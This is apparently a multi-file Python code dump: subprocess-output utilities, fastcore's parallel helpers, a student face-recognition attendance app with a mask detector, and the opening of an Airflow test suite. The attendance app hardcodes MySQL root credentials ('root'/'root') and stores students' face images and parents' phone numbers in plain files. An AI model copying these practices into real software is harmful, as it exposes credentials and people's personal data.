Queue.Queue() def read_process_stdout(): # TODO(jbudorick): Pick an appropriate read size here. while True: try: output_chunk = os.read(process.stdout.fileno(), buffer_size) except IOError: break stdout_queue.put(output_chunk, True) if not output_chunk and process.poll() is not None: break reader_thread = threading.Thread(target=read_process_stdout) reader_thread.start() end_time = (time.time() + timeout) if timeout else None try: while True: if end_time and time.time() > end_time: raise TimeoutError() try: s = stdout_queue.get(True, iter_timeout) if not s: break yield s except Queue.Empty: yield None finally: try: if process.returncode is None: # Make sure the process doesn't stick around if we fail with an # exception. process.kill() except OSError: pass process.wait() reader_thread.join() _IterProcessStdout = ( _IterProcessStdoutQueue if sys.platform == 'win32' else _IterProcessStdoutFcntl) """Iterate over a process's stdout. This is intentionally not public. Args: process: The process in question. iter_timeout: An optional length of time, in seconds, to wait in between each iteration. If no output is received in the given time, this generator will yield None. timeout: An optional length of time, in seconds, during which the process must finish. If it fails to do so, a TimeoutError will be raised. buffer_size: The maximum number of bytes to read (and thus yield) at once. poll_interval: The length of time to wait in calls to `select.select`. If iter_timeout is set, the remaining length of time in the iteration may take precedence. Raises: TimeoutError: if timeout is set and the process does not complete. Yields: basestrings of data or None. """ def GetCmdStatusAndOutputWithTimeout(args, timeout, cwd=None, shell=False, logfile=None, env=None): """Executes a subprocess with a timeout. Args: args: List of arguments to the program, the program to execute is the first element. timeout: the timeout in seconds or None to wait forever. cwd: If not None, the subprocess's current directory will be changed to |cwd| before it's executed. shell: Whether to execute args as a shell command. Must be True if args is a string and False if args is a sequence. logfile: Optional file-like object that will receive output from the command as it is running. env: If not None, a mapping that defines environment variables for the subprocess. Returns: The 2-tuple (exit code, output). Raises: TimeoutError on timeout. """ _ValidateAndLogCommand(args, cwd, shell) output = StringIO.StringIO() process = Popen(args, cwd=cwd, shell=shell, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, env=env) try: for data in _IterProcessStdout(process, timeout=timeout): if logfile: logfile.write(data) output.write(data) except TimeoutError: raise TimeoutError(output.getvalue()) str_output = output.getvalue() logger.debug('STDOUT+STDERR: %s%s', str_output[:4096].rstrip(), '<truncated>' if len(str_output) > 4096 else '') return process.returncode, str_output def IterCmdOutputLines(args, iter_timeout=None, timeout=None, cwd=None, shell=False, env=None, check_status=True): """Executes a subprocess and continuously yields lines from its output. Args: args: List of arguments to the program, the program to execute is the first element. iter_timeout: Timeout for each iteration, in seconds. timeout: Timeout for the entire command, in seconds. cwd: If not None, the subprocess's current directory will be changed to |cwd| before it's executed. shell: Whether to execute args as a shell command. Must be True if args is a string and False if args is a sequence. env: If not None, a mapping that defines environment variables for the subprocess. check_status: A boolean indicating whether to check the exit status of the process after all output has been read. Yields: The output of the subprocess, line by line. Raises: CalledProcessError if check_status is True and the process exited with a non-zero exit status. """ cmd = _ValidateAndLogCommand(args, cwd, shell) process = Popen(args, cwd=cwd, shell=shell, env=env, stdout=subprocess.PIPE, stderr=subprocess.STDOUT) return _IterCmdOutputLines( process, cmd, iter_timeout=iter_timeout, timeout=timeout, check_status=check_status) def _IterCmdOutputLines(process, cmd, iter_timeout=None, timeout=None, check_status=True): buffer_output = '' iter_end = None cur_iter_timeout = None if iter_timeout: iter_end = time.time() + iter_timeout cur_iter_timeout = iter_timeout for data in _IterProcessStdout(process, iter_timeout=cur_iter_timeout, timeout=timeout): if iter_timeout: # Check whether the current iteration has timed out. cur_iter_timeout = iter_end - time.time() if data is None or cur_iter_timeout < 0: yield None iter_end = time.time() + iter_timeout continue else: assert data is not None, ( 'Iteration received no data despite no iter_timeout being set. ' 'cmd: %s' % cmd) # Construct lines to yield from raw data. buffer_output += data has_incomplete_line = buffer_output[-1] not in '\r\n' lines = buffer_output.splitlines() buffer_output = lines.pop() if has_incomplete_line else '' for line in lines: yield line if iter_timeout: iter_end = time.time() + iter_timeout if buffer_output: yield buffer_output if check_status and process.returncode: raise subprocess.CalledProcessError(process.returncode, cmd)
parallel.py
# AUTOGENERATED! DO NOT EDIT! File to edit: nbs/03a_parallel.ipynb (unless otherwise specified). __all__ = ['threaded', 'startthread', 'set_num_threads', 'check_parallel_num', 'ThreadPoolExecutor', 'ProcessPoolExecutor', 'parallel', 'run_procs', 'parallel_gen'] # Cell from .imports import * from .foundation import * from .basics import * from .xtras import * from functools import wraps # from contextlib import contextmanager,ExitStack from multiprocessing import Process, Queue import concurrent.futures,time from multiprocessing import Manager, set_start_method from threading import Thread try: if sys.platform == 'darwin': set_start_method("fork") except: pass # Cell def threaded(f): "Run `f` in a thread, and returns the thread" @wraps(f) def _f(*args, **kwargs): res = Thread(target=f, args=args, kwargs=kwargs) res.start() return res return _f # Cell def startthread(f): "Like `threaded`, but start thread immediately" threaded(f)() # Cell def set_num_threads(nt): "Get numpy (and others) to use `nt` threads" try: import mkl; mkl.set_num_threads(nt) except: pass try: import torch; torch.set_num_threads(nt) except: pass os.environ['IPC_ENABLE']='1' for o in ['OPENBLAS_NUM_THREADS','NUMEXPR_NUM_THREADS','OMP_NUM_THREADS','MKL_NUM_THREADS']: os.environ[o] = str(nt) # Cell def _call(lock, pause, n, g, item): l = False if pause: try: l = lock.acquire(timeout=pause*(n+2)) time.sleep(pause) finally: if l: lock.release() return g(item) # Cell def check_parallel_num(param_name, num_workers): if sys.platform == "win32" and IN_NOTEBOOK and num_workers > 0: print("Due to IPython and Windows limitation, python multiprocessing isn't available now.") print(f"So `{param_name}` is changed to 0 to avoid getting stuck") num_workers = 0 return num_workers # Cell class ThreadPoolExecutor(concurrent.futures.ThreadPoolExecutor): "Same as Python's ThreadPoolExecutor, except can pass `max_workers==0` for serial execution" def __init__(self, max_workers=defaults.cpus, on_exc=print, pause=0, **kwargs): if max_workers is None: max_workers=defaults.cpus store_attr() self.not_parallel = max_workers==0 if self.not_parallel: max_workers=1 super().__init__(max_workers, **kwargs) def map(self, f, items, *args, timeout=None, chunksize=1, **kwargs): if self.not_parallel == False: self.lock = Manager().Lock() g = partial(f, *args, **kwargs) if self.not_parallel: return map(g, items) _g = partial(_call, self.lock, self.pause, self.max_workers, g) try: return super().map(_g, items, timeout=timeout, chunksize=chunksize) except Exception as e: self.on_exc(e) # Cell class ProcessPoolExecutor(concurrent.futures.ProcessPoolExecutor): "Same as Python's ProcessPoolExecutor, except can pass `max_workers==0` for serial execution" def __init__(self, max_workers=defaults.cpus, on_exc=print, pause=0, **kwargs): if max_workers is None: max_workers=defaults.cpus max_workers = check_parallel_num('max_workers', max_workers) store_attr() self.not_parallel = max_workers==0 if self.not_parallel: max_workers=1 super().__init__(max_workers, **kwargs) def map(self, f, items, *args, timeout=None, chunksize=1, **kwargs): if self.not_parallel == False: self.lock = Manager().Lock() g = partial(f, *args, **kwargs) if self.not_parallel: return map(g, items) _g = partial(_call, self.lock, self.pause, self.max_workers, g) try: return super().map(_g, items, timeout=timeout, chunksize=chunksize) except Exception as e: self.on_exc(e) # Cell try: from fastprogress import progress_bar except: progress_bar = None # Cell def parallel(f, items, *args, n_workers=defaults.cpus, total=None, progress=None, pause=0, threadpool=False, timeout=None, chunksize=1, **kwargs): "Applies `func` in parallel to `items`, using `n_workers`" pool = ThreadPoolExecutor if threadpool else ProcessPoolExecutor with pool(n_workers, pause=pause) as ex: r = ex.map(f,items, *args, timeout=timeout, chunksize=chunksize, **kwargs) if progress and progress_bar: if total is None: total = len(items) r = progress_bar(r, total=total, leave=False) return L(r) # Cell def run_procs(f, f_done, args): "Call `f` for each item in `args` in parallel, yielding `f_done`" processes = L(args).map(Process, args=arg0, target=f) for o in processes: o.start() yield from f_done() processes.map(Self.join()) # Cell def _f_pg(obj, queue, batch, start_idx): for i,b in enumerate(obj(batch)): queue.put((start_idx+i,b)) def _done_pg(queue, items): return (queue.get() for _ in items) # Cell def parallel_gen(cls, items, n_workers=defaults.cpus, **kwargs): "Instantiate `cls` in `n_workers` procs & call each on a subset of `items` in parallel." n_workers = check_parallel_num('n_workers', n_workers) if n_workers==0: yield from enumerate(list(cls(**kwargs)(items))) return batches = L(chunked(items, n_chunks=n_workers)) idx = L(itertools.accumulate(0 + batches.map(len))) queue = Queue() if progress_bar: items = progress_bar(items, leave=False) f=partial(_f_pg, cls(**kwargs), queue) done=partial(_done_pg, queue, items) yield from run_procs(f, done, L(batches,idx).zip())
run.py
import tkinter as tk from tkinter import * import cv2, os # import mysql.connector import shutil import csv import numpy as np from PIL import Image, ImageTk import pandas as pd import datetime import time import tkinter.ttk as ttk import tkinter.font as font from tensorflow.keras.applications.mobilenet_v2 import preprocess_input from tensorflow.keras.preprocessing.image import img_to_array from tensorflow.keras.models import load_model from imutils.video import VideoStream import numpy as np import argparse import imutils import json import cv2 import os import requests import pywhatkit as kit from threading import Thread import mysql.connector mydb = mysql.connector.connect(host="localhost",user="root",passwd="root",database="attendify1") mycursor = mydb.cursor() def whatsapp(number,hour,min): # #data = pd.read_csv("Attendance\Attendance_" + date + ".csv") # data_dict = data.to_dict('list') # leads = data_dict['Number'] # print (leads) # # # # text = 'hey how are you...' # # j = 0 # for i in leads: # # # mini = int(min) + 2 + j # kit.sendwhatmsg("+91" + number, text, int(hour), mini) # j = j + 1 # #list kit.sendwhatmsg("+91" + number, "Hey your attendances has been recorded", int(hour), int(min) + 2) root = Tk() root.title("Iem AI Based Attendence System") canvas = Canvas(root, width=2250, height=1280) image = ImageTk.PhotoImage(Image.open("Images\\background.png")) canvas.create_image(5, 5, anchor=NW, image=image) canvas.pack() root.grid_rowconfigure(0, weight=1) root.grid_columnconfigure(0, weight=1) id2 = tk.Label(root, text="* Additional Covid 19 Feature", font=('times', 15, ' bold ')) id2.place(x=80, y=390) id1 = tk.Label(root, text="Enter ID", width=10, height=1, fg="black", bg="white", font=('times', 15, ' bold ')) id1.place(x=375, y=250) txt1 = tk.Entry(root, width=30, bg="white", fg="black", font=('times', 12, ' ')) txt1.place(x=400, y=290) name1 = tk.Label(root, text="Enter Name", width=10, height=1, fg="black", bg="white", font=('times', 15, ' bold ')) name1.place(x=390, y=330) txt2 = tk.Entry(root, width=30, bg="white", fg="black", font=('times', 12, ' ')) txt2.place(x=400, y=370) ph1 = tk.Label(root, text="Parent's Phone Number", width=20, height=1, fg="black", bg="white", font=('times', 15, 'bold')) ph1.place(x=380, y=410) txt3 = tk.Entry(root, width=30, bg="white", fg="black", font=('times', 12, ' ')) txt3.place(x=400, y=450) message2 = tk.Label(root, text="", fg="black", bg="white", font=('times', 15, ' bold ')) message2.place(x=700, y=650) def maskdetor(): def detect_and_predict_mask(frame, faceNet, maskNet): # grab the dimensions of the frame and then construct a blob # from it (h, w) = frame.shape[:2] blob = cv2.dnn.blobFromImage(frame, 1.0, (300, 300), (104.0, 177.0, 123.0)) # pass the blob through the network and obtain the face detections faceNet.setInput(blob) detections = faceNet.forward() # initialize our list of faces, their corresponding locations, # and the list of predictions from our face mask network faces = [] locs = [] preds = [] # loop over the detections for i in range(0, detections.shape[2]): # extract the confidence (i.e., probability) associated with # the detection confidence = detections[0, 0, i, 2] # filter out weak detections by ensuring the confidence is # greater than the minimum confidence if confidence > args["confidence"]: # compute the (x, y)-coordinates of the bounding box for # the object box = detections[0, 0, i, 3:7] * np.array([w, h, w, h]) (startX, startY, endX, endY) = box.astype("int") # ensure the bounding boxes fall within the dimensions of # the frame (startX, startY) = (max(0, startX), max(0, startY)) (endX, endY) = (min(w - 1, endX), min(h - 1, endY)) # extract the face ROI, convert it from BGR to RGB channel # ordering, resize it to 224x224, and preprocess it face = frame[startY:endY, startX:endX] face = cv2.cvtColor(face, cv2.COLOR_BGR2RGB) face = cv2.resize(face, (224, 224)) face = img_to_array(face) face = preprocess_input(face) # add the face and bounding boxes to their respective # lists faces.append(face) locs.append((startX, startY, endX, endY)) # only make a predictions if at least one face was detected if len(faces) > 0: # for faster inference we'll make batch predictions on *all* # faces at the same time rather than one-by-one predictions # in the above `for` loop faces = np.array(faces, dtype="float32") preds = maskNet.predict(faces, batch_size=32) # return a 2-tuple of the face locations and their corresponding # locations return (locs, preds) # construct the argument parser and parse the arguments ap = argparse.ArgumentParser() ap.add_argument("-f", "--face", type=str, default="face_detector", help="path to face detector model directory") ap.add_argument("-m", "--model", type=str, default="mask_detector.model", help="path to trained face mask detector model") ap.add_argument("-c", "--confidence", type=float, default=0.5, help="minimum probability to filter weak detections") args = vars(ap.parse_args()) # load our serialized face detector model from disk print("[INFO] loading face detector model...") prototxtPath = os.path.sep.join([args["face"], "deploy.prototxt"]) weightsPath = os.path.sep.join([args["face"], "res10_300x300_ssd_iter_140000.caffemodel"]) faceNet = cv2.dnn.readNet(prototxtPath, weightsPath) # load the face mask detector model from disk print("[INFO] loading face mask detector model...") maskNet = load_model(args["model"]) # initialize the video stream and allow the camera sensor to warm up print("[INFO] starting video stream...") vs = VideoStream(src=0).start() time.sleep(2.0) # loop over the frames from the video stream while True: # grab the frame from the threaded video stream and resize it # to have a maximum width of 400 pixels frame = vs.read() frame = imutils.resize(frame, width=400) # detect faces in the frame and determine if they are wearing a # face mask or not (locs, preds) = detect_and_predict_mask(frame, faceNet, maskNet) # loop over the detected face locations and their corresponding # locations for (box, pred) in zip(locs, preds): # unpack the bounding box and predictions (startX, startY, endX, endY) = box (mask, withoutMask) = pred # determine the class label and color we'll use to draw # the bounding box and text label = "Mask" if mask > withoutMask else "No Mask" color = (0, 255, 0) if label == "Mask" else (0, 0, 255) # include the probability in the label label = "{}: {:.2f}%".format(label, max(mask, withoutMask) * 100) # display the label and bounding box rectangle on the output # frame cv2.putText(frame, label, (startX, startY - 10), cv2.FONT_HERSHEY_SIMPLEX, 0.45, color, 2) cv2.rectangle(frame, (startX, startY), (endX, endY), color, 2) # show the output frame cv2.imshow("Frame", frame) key = cv2.waitKey(1) & 0xFF # if the `q` key was pressed, break from the loop if key == ord("w"): break # do a bit of cleanup cv2.destroyAllWindows() vs.stop() def clear(): txt1.delete(0, 'end') res = "" message.configure(text=res) def clear2(): txt2.delete(0, 'end') res = "" message.configure(text=res) def clear3(): txt3.delete(0, 'end') res = "" message.configure(text=res) def is_number(s): try: float(s) return True except ValueError: pass try: import unicodedata unicodedata.numeric(s) return True except (TypeError, ValueError): pass return False def TakeImages(): Id = (txt1.get()) name = (txt2.get()) phone_number = (txt3.get()) if is_number(Id) and name.isalpha() and is_number(phone_number): cam = cv2.VideoCapture(0) harcascadePath = "haarcascade_frontalface_default.xml" detector = cv2.CascadeClassifier(harcascadePath) sampleNum = 0 while (True): ret, img = cam.read() gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY) faces = detector.detectMultiScale(gray, 1.3, 5) for (x, y, w, h) in faces: cv2.rectangle(img, (x, y), (x + w, y + h), (255, 0, 0), 2) # incrementing sample number sampleNum = sampleNum + 1 # saving the captured face in the dataset folder TrainingImage cv2.imwrite("TrainingImage\ " + name + "." + Id + '.' + str(sampleNum) + ".jpg", gray[y:y + h, x:x + w]) # display the frame cv2.imshow('frame', img) # wait for 100 miliseconds if cv2.waitKey(100) & 0xFF == ord('q'): break # break if the sample number is morethan 100 elif sampleNum > 60: break cam.release() cv2.destroyAllWindows() res = "Images Saved for ID : " + Id + " Name : " + name + " Parent's Phone Number : " + phone_number row = [Id, name, phone_number] with open('StudentDetails\StudentDetails.csv', 'a+') as csvFile: writer = csv.writer(csvFile) writer.writerow(row) csvFile.close() message.configure(text=res) sql = "Insert into tbl_people (id,firstname,emailaddress) values(%s,%s,%s)" val = (Id, name, phone_number) mycursor.execute(sql, val) sql1="insert into tbl_company_data (reference,company,department,jobposition,idno) values (%s,%s,%s,%s,%s)" val1=(Id,"Institute of Engineering & Management","Bca","Student",Id) mycursor.execute(sql1,val1) mydb.commit() else: # print(is_number(Id)) # print(name.isalpha()) # print(is_number(phone_number)) if (is_number(Id) and name.isalpha()): res="Enter Phone Number" message.configure(text=res) elif is_number(Id) and is_number(phone_number): res="Enter Alphabetical Name" message.configure(text=res) elif (name.isalpha() and is_number(phone_number)): res="Enter Numeric Id" message.configure(text=res) elif is_number(Id): res="Enter Phone Number \n Enter Alphabetical Name" message.configure(text=res) elif name.isalpha(): res="Enter Numeric Id \n Enter Phone Number" message.configure(text=res) elif is_number(phone_number): res="Enter Alphabetical Name \n Enter Numeric Id" message.configure(text=res) def TrainImages(): recognizer = cv2.face.LBPHFaceRecognizer_create() # recognizer = cv2.face.LBPHFaceRecognizer_create()#$cv2.createLBPHFaceRecognizer() harcascadePath = "haarcascade_frontalface_default.xml" detector = cv2.CascadeClassifier(harcascadePath) faces, Id = getImagesAndLabels("TrainingImage") recognizer.train(faces, np.array(Id)) recognizer.save("TrainingImageLabel\Trainner.yml") res = "Image Trained" # +",".join(str(f) for f in Id) message.configure(text=res) def getImagesAndLabels(path): # get the path of all the files in the folder imagePaths = [os.path.join(path, f) for f in os.listdir(path)] # print(imagePaths) # create empth face list faces = [] # create empty ID list Ids = [] # now looping through all the image paths and loading the Ids and the images for imagePath in imagePaths: # loading the image and converting it to gray scale pilImage = Image.open(imagePath).convert('L') # Now we are converting the PIL image into numpy array imageNp = np.array(pilImage, 'uint8') # getting the Id from the image Id = int(os.path.split(imagePath)[-1].split(".")[1]) # extract the face from the training image sample faces.append(imageNp) Ids.append(Id) return faces, Ids def TrackImages(): recognizer = cv2.face.LBPHFaceRecognizer_create() # cv2.createLBPHFaceRecognizer() recognizer.read("TrainingImageLabel\Trainner.yml") harcascadePath = "haarcascade_frontalface_default.xml" faceCascade = cv2.CascadeClassifier(harcascadePath); df = pd.read_csv("StudentDetails\StudentDetails.csv") cam = cv2.VideoCapture(0) font = cv2.FONT_HERSHEY_SIMPLEX col_names = ['Id', 'Name', 'Date', 'Time','Phone Number'] attendance = pd.DataFrame(columns=col_names) while True: ret, im = cam.read() gray = cv2.cvtColor(im, cv2.COLOR_BGR2GRAY) faces = faceCascade.detectMultiScale(gray, 1.2, 5) for (x, y, w, h) in faces: cv2.rectangle(im, (x, y), (x + w, y + h), (225, 0, 0), 2) Id, conf = recognizer.predict(gray[y:y + h, x:x + w]) print(conf) if (conf < 50): ts = time.time() date = datetime.datetime.fromtimestamp(ts).strftime('%Y-%m-%d') timeStamp = datetime.datetime.fromtimestamp(ts).strftime('%H:%M:%S') aa = df.loc[df['Id'] == Id]['Name'].values pp = df.loc[df['Id'] == Id]['Phone Number'].values tt = str(Id) + "-" + aa attendance.loc[len(attendance)] = [Id, aa, date, timeStamp,pp] else: Id = 'Unknown' tt = str(Id) if (conf > 75): noOfFile = len(os.listdir("ImagesUnknown")) + 1 cv2.imwrite("ImagesUnknown\Image" + str(noOfFile) + ".jpg", im[y:y + h, x:x + w]) cv2.putText(im, str(tt), (x, y + h), font, 1, (255, 255, 255), 2) attendance = attendance.drop_duplicates(subset=['Id'], keep='first') cv2.imshow('im', im) if (cv2.waitKey(1) == ord('q')): break ts = time.time() date = datetime.datetime.fromtimestamp(ts).strftime('%Y-%m-%d') timeStamp = datetime.datetime.fromtimestamp(ts).strftime('%H:%M:%S') Hour, Minute, Second = timeStamp.split(":") print("My name is ", aa[0]) print("My id is", Id) print("my phone is ",pp[0]) number = str(pp[0]) print(type(number)) print(type(aa[0])) print(type(Id)) # try: # t = Thread(target=whatsapp(number,Hour,Minute)) # t.deamon=true # t.start() # except: # print("Unable to send text") #kit.sendwhatmsg("+91"+number, "Hey your attendances has been recorded" , int(Hour) , int(Minute)+2) # sql = "INSERT INTO testyash (idno,employee) VALUES (%s,&s)" #val = ("100", "Yash Kanoria") # mycursor.execute(sql, val) # # mydb.commit() # # url = "https://attendify-api.herokuapp.com/" # response = requests.get(url) print("both", aa[0], Id) sql = "Insert into tbl_people_attendance(idno,date,employee,timein) values (%s,%s,%s,%s)" val=(10,date,aa[0],timeStamp) mycursor.execute(sql,val) mydb.commit() # payload = "{\r\n \"rollNo\": \"1\",\r\n \"name\": \"Yash Kanoria\"\r\n}" # PARAMS = {'rollNo': '12345' ,'name': 'test23456'} # headers = { # 'Content-Type': 'application/json' # } # PARAMS = {'rollNo': Id, 'name': aa[0]} # print(PARAMS) # response = requests.post(url, data=json.dumps(PARAMS), headers=headers) # print(response.text.encode('utf8')) fileName = "Attendance\Attendance_" + date + ".csv" # fileName="Attendance\Attendance_"+date+"_"+Hour+"-"+Minute+"-"+Second+".csv" # print("1 record inserted, ID:", mycursor.lastrowid) attendance.to_csv(fileName, mode='a', index=False) #attendance.to_csv(fileName, mode='a', index=False) cam.release() cv2.destroyAllWindows() print(attendance) res = attendance message2.configure(text=res) loadimageclear1 = tk.PhotoImage(file="Images\\Clear.png") roundedbuttonclear1 = tk.Button(root, image=loadimageclear1, command=clear) roundedbuttonclear1["bg"] = "white" roundedbuttonclear1["border"] = "0" roundedbuttonclear1.place(x=670, y=285) roundedbuttonclear2 = tk.Button(root, image=loadimageclear1, command=clear2) roundedbuttonclear2["bg"] = "white" roundedbuttonclear2["border"] = "0" roundedbuttonclear2.place(x=670, y=365) roundedbuttonclear3 = tk.Button(root, image=loadimageclear1, command=clear3) roundedbuttonclear3["bg"] = "white" roundedbuttonclear3["border"] = "0" roundedbuttonclear3.place(x=670, y=445) notification = tk.Label(root, text="Notification : ", width=12, height=1, fg="black", bg="white", font=('times', 15, ' bold ')) notification.place(x=390, y=490) message = tk.Label(root, text=" ", width=30, height=2, fg="black", font=('times', 15, ' bold ')) message.place(x=540, y=490) take = tk.PhotoImage(file="Images\\Take_Images.png") take_images = tk.Button(root, image=take, command=TakeImages) take_images["bg"] = "white" take_images["border"] = "0" take_images.place(x=380, y=550) training = tk.PhotoImage(file="Images\\Train_Images.png") train_images = tk.Button(root, image=training, command=TrainImages) train_images["bg"] = "white" train_images["border"] = "0" train_images.place(x=530, y=550) track = tk.PhotoImage(file="Images\\Take_Attendence.png") track_images = tk.Button(root, image=track, command=TrackImages) track_images["bg"] = "white" track_images["border"] = "0" track_images.place(x=680, y=550) q = tk.PhotoImage(file="Images\\Quit.png") qt = tk.Button(root, image=q, command=root.destroy) qt["bg"] = "white" qt["border"] = "0" qt.place(x=830, y=550) q1 = tk.PhotoImage(file="Images\\Detect_Mask.png") qt1 = tk.Button(root, image=q1, command=maskdetor) qt1["bg"] = "white" qt1["border"] = "0" qt1.place(x=130, y=320) root.mainloop()
core.py
# -*- coding: utf-8 -*- # # Licensed to the Apache Software Foundation (ASF) under one # or more contributor license agreements. See the NOTICE file # distributed with this work for additional information # regarding copyright ownership. The ASF licenses this file # to you under the Apache License, Version 2.0 (the # "License"); you may not use this file except in compliance # with the License. You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, # software distributed under the License is distributed on an # "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY # KIND, either express or implied. See the License for the # specific language governing permissions and limitations # under the License. from __future__ import print_function import json import unittest import bleach import doctest import mock import multiprocessing import os import re import signal import sqlalchemy import subprocess import tempfile import warnings from datetime import timedelta from dateutil.relativedelta import relativedelta from email.mime.application import MIMEApplication from email.mime.multipart import MIMEMultipart from email.mime.text import MIMEText from numpy.testing import assert_array_almost_equal from six.moves.urllib.parse import urlencode from time import sleep from airflow import configuration from airflow.executors import SequentialExecutor from airflow.models import Variable from airflow import jobs, models, DAG, utils, macros, settings, exceptions from airflow.models import BaseOperator from airflow.operators.bash_operator import BashOperator from airflow.operators.check_operator import CheckOperator, ValueCheckOperator from airflow.operators.dagrun_operator import TriggerDagRunOperator from airflow.operators.python_operator import PythonOperator from airflow.operators.dummy_operator import DummyOperator from airflow.hooks.base_hook import BaseHook from airflow.hooks.sqlite_hook import SqliteHook from airflow.bin import cli from airflow.www import app as application from airflow.settings import Session from airflow.utils import timezone from airflow.utils.timezone import datetime from airflow.utils.state import State from airflow.utils.dates import infer_time_unit, round_time, scale_time_units from lxml import html from airflow.exceptions import AirflowException from airflow.configuration import AirflowConfigException, run_command from jinja2.sandbox import SecurityError from jinja2 import UndefinedError from pendulum import utcnow import six NUM_EXAMPLE_DAGS = 18 DEV_NULL = '/dev/null' TEST_DAG_FOLDER = os.path.join( os.path.dirname(os.path.realpath(__file__)), 'dags') DEFAULT_DATE = datetime(2015, 1, 1) DEFAULT_DATE_ISO = DEFAULT_DATE.isoformat() DEFAULT_DATE_DS = DEFAULT_DATE_ISO[:10] TEST_DAG_ID = 'unit_tests' try: import cPickle as pickle except ImportError: # Python 3 import pickle def reset(dag_id=TEST_DAG_ID): session = Session() tis = session.query(models.TaskInstance).filter_by(dag_id=dag_id) tis.delete() session.commit() session.close() configuration.conf.load_test_config() if os.environ.get('KUBERNETES_VERSION') is None: reset() class OperatorSubclass(BaseOperator): """ An operator to test template substitution """ template_fields = ['some_templated_field'] def __init__(self, some_templated_field, *args, **kwargs): super(OperatorSubclass, self).__init__(*args, **kwargs) self.some_templated_field = some_templated_field def execute(*args, **kwargs): pass class CoreTest(unittest.TestCase): default_scheduler_args = {"num_runs": 1} def setUp(self): configuration.conf.load_test_config() self.dagbag = models.DagBag( dag_folder=DEV_NULL, include_examples=True) self.args = {'owner': 'airflow', 'start_date': DEFAULT_DATE} self.dag = DAG(TEST_DAG_ID, default_args=self.args) self.dag_bash = self.dagbag.dags['example_bash_operator'] self.runme_0 = self.dag_bash.get_task('runme_0') self.run_after_loop = self.dag_bash.get_task('run_after_loop') self.run_this_last = self.dag_bash.get_task('run_this_last') def test_schedule_dag_no_previous_runs(self): """ Tests scheduling a dag with no previous runs """ dag = DAG(TEST_DAG_ID + 'test_schedule_dag_no_previous_runs') dag.add_task(models.BaseOperator( task_id="faketastic", owner='Also fake', start_date=datetime(2015, 1, 2, 0, 0))) dag_run = jobs.SchedulerJob(**self.default_scheduler_args).create_dag_run(dag) self.assertIsNotNone(dag_run) self.assertEqual(dag.dag_id, dag_run.dag_id) self.assertIsNotNone(dag_run.run_id) self.assertNotEqual('', dag_run.run_id) self.assertEqual( datetime(2015, 1, 2, 0, 0), dag_run.execution_date, msg='dag_run.execution_date did not match expectation: {0}' .format(dag_run.execution_date) ) self.assertEqual(State.RUNNING, dag_run.state) self.assertFalse(dag_run.external_trigger) dag.clear() def test_schedule_dag_relativedelta(self): """ Tests scheduling a dag with a relativedelta schedule_interval """ delta = relativedelta(hours=+1) dag = DAG(TEST_DAG_ID + 'test_schedule_dag_relativedelta', schedule_interval=delta) dag.add_task(models.BaseOperator( task_id="faketastic", owner='Also fake', start_date=datetime(2015, 1, 2, 0, 0))) dag_run = jobs.SchedulerJob(**self.default_scheduler_args).create_dag_run(dag) self.assertIsNotNone(dag_run) self.assertEqual(dag.dag_id, dag_run.dag_id) self.assertIsNotNone(dag_run.run_id) self.assertNotEqual('', dag_run.run_id) self.assertEqual( datetime(2015, 1, 2, 0, 0), dag_run.execution_date, msg='dag_run.execution_date did not match expectation: {0}' .format(dag_run.execution_date) ) self.assertEqual(State.RUNNING, dag_run.state) self.assertFalse(dag_run.external_trigger) dag_run2 = jobs.SchedulerJob(**self.default_scheduler_args).create_dag_run(dag) self.assertIsNotNone(dag_run2) self.assertEqual(dag.dag_id, dag_run2.dag_id) self.assertIsNotNone(dag_run2.run_id) self.assertNotEqual('', dag_run2.run_id) self.assertEqual( datetime(2015, 1, 2, 0, 0) + delta, dag_run2.execution_date, msg='dag_run2.execution_date did not match expectation: {0}' .format(dag_run2.execution_date) ) self.assertEqual(State.RUNNING, dag_run2.state) self.assertFalse(dag_run2.external_trigger) dag.clear() def test_schedule_dag_fake_scheduled_previous(self): """ Test scheduling a dag where there is a prior DagRun which has the same run_id as the next run should have """ delta = timedelta(hours=1) dag = DAG(TEST_DAG_ID + 'test_schedule_dag_fake_scheduled_previous', schedule_interval=delta, start_date=DEFAULT_DATE) dag.add_task(models.BaseOperator( task_id="faketastic", owner='Also fake', start_date=DEFAULT_DATE)) scheduler = jobs.SchedulerJob(**self.default_scheduler_args) dag.create_dagrun(run_id=models.DagRun.id_for_date(DEFAULT_DATE), execution_date=DEFAULT_DATE, state=State.SUCCESS, external_trigger=True) dag_run = scheduler.create_dag_run(dag) self.assertIsNotNone(dag_run) self.assertEqual(dag.dag_id, dag_run.dag_id) self.assertIsNotNone(dag_run.run_id) self.assertNotEqual('', dag_run.run_id) self.assertEqual( DEFAULT_DATE + delta, dag_run.execution_date, msg='dag_run.execution_date did not match expectation: {0}' .format(dag_run.execution_date) ) self.assertEqual(State.RUNNING, dag_run.state) self.assertFalse(dag_run.external_trigger) def test_schedule_dag_once(self): """ Tests scheduling a dag scheduled for @once - should be scheduled the first time it is called, and not scheduled the second. """ dag = DAG(TEST_DAG_ID + 'test_schedule_dag_once') dag.schedule_interval = '@once' dag.add_task(models.BaseOperator( task_id="faketastic", owner='Also fake', start_date=datetime(2015, 1, 2, 0, 0))) dag_run = jobs.SchedulerJob(**self.default_scheduler_args).create_dag_run(dag) dag_run2 = jobs.SchedulerJob(**self.default_scheduler_args).create_dag_run(dag) self.assertIsNotNone(dag_run) self.assertIsNone(dag_run2) dag.clear() def test_fractional_seconds(self): """ Tests if fractional seconds are stored in the database """ dag = DAG(TEST_DAG_ID + 'test_fractional_seconds') dag.schedule_interval = '@once' dag.add_task(models.BaseOperator( task_id="faketastic", owner='Also fake', start_date=datetime(2015, 1, 2, 0, 0))) start_date = timezone.utcnow() run = dag.create_dagrun( run_id='test_' + start_date.isoformat(), execution_date=start_date, start_date=start_date, state=State.RUNNING, external_trigger=False ) run.refresh_from_db() self.assertEqual(start_date, run.execution_date, "dag run execution_date loses precision") self.assertEqual(start_date, run.start_date, "dag run start_date loses precision ") def test_schedule_dag_start_end_dates(self): """ Tests that an attempt to schedule a task after the Dag's end_date does not succeed. """ delta = timedelta(hours=1) runs = 3 start_date = DEFAULT_DATE end_date = start_date + (runs - 1) * delta dag = DAG(TEST_DAG_ID + 'test_schedule_dag_start_end_dates', start_date=start_date, end_date=end_date, 